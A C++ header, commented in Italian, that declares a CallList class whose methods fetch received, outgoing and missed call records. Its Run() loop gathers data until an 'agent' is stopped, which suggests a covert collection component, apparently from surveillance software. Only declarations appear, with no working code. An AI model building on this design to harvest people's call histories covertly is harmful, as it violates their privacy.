#include "Common.h"
#include <string>
#include <exception>
using namespace std;

#ifndef __CallList_h__
#define __CallList_h__

#include "Log.h"
#include "Status.h"

class Log;
class Status;
class CallList;

class CallList
{
	/**
	 * Utilizzato per scrivere i log.
	 */
	private: Log* logObj;
	private: Status statusObj;

	/**
	 * Riempie la struttura CallStruct con la chiamata ottenuta dall'Id. Torna un puntatore alla lista contenente
	 * l'entry richiesta.
	 */
	private: list<CallStruct*>* GetCallByIndex(UINT id);

	/**
	 * Torna una lista contenente tutte le chiamate ricevute.
	 */
	private: list<CallStruct*>* GetReceivedCalls();

	/**
	 * Torna una lista contenente tutte le chiamate effettuate.
	 */
	private: list<CallStruct*>* GetOutgoingCalls();

	/**
	 * Torna una lista contenente tutte le chiamate perse.
	 */
	private: list<CallStruct*>* GetMissedCalls();

	/**
	 * Torna una lista contenente tutte le chiamate presenti nella lista (ricevute, in uscita e perse).
	 */
	private: list<CallStruct*>* GetAll();

	/**
	 * Costruttore dell'oggetto, prende un intero per definire il tipo di dati da acquisire.
	 */
	public:  CallList(UINT type);

	/**
	 * Loop infinito che effettua il gathering dei dati, esce con una ExitThread() quando viene richiesto lo stop
	 * dell'agente.
	 */
	public: void Run();
};

#endif
